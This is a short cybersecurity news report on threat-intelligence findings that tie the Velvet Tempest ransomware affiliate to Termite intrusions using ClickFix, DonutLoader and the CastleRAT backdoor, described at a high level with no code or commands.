Cybersecurity researchers have uncovered a connection between Termite ransomware intrusions and a sophisticated attack chain utilizing the "ClickFix" technique and the CastleRAT backdoor. The threat group, tracked as Velvet Tempest (also known as DEV-0504), has been observed deploying these tools after initial network compromise. This group has a long history as a ransomware affiliate, having been associated with major strains like Ryuk, REvil, Conti, and BlackCat/ALPHV over the past five years.
The attack methodology was documented by threat intelligence firm MalBeacon, which observed the group's activities in an emulated environment of a U.S. non-profit organization over 12 days in February. After gaining access, the attackers performed extensive hands-on-keyboard activities, including Active Directory reconnaissance and host discovery. A key part of their operation involved using a PowerShell script to harvest credentials stored in the Chrome browser.
This credential-harvesting script was hosted on an IP address that researchers directly linked to the tool staging infrastructure used in Termite ransomware campaigns. The attackers then employed the ClickFix technique, which abuses legitimate Windows utilities, to deploy the DonutLoader malware. This loader subsequently installs the CastleRAT remote access trojan, providing persistent backdoor access and paving the way for potential ransomware deployment.
The findings highlight the evolving tactics of established ransomware affiliates, who continue to refine their post-exploitation toolkits. By linking specific tools and infrastructure to the Velvet Tempest group, security teams can better defend against this threat. The use of living-off-the-land binaries (LOLBins) like PowerShell for credential theft and the deployment of a custom RAT underscores the need for robust endpoint detection and monitoring of unusual administrative activity.
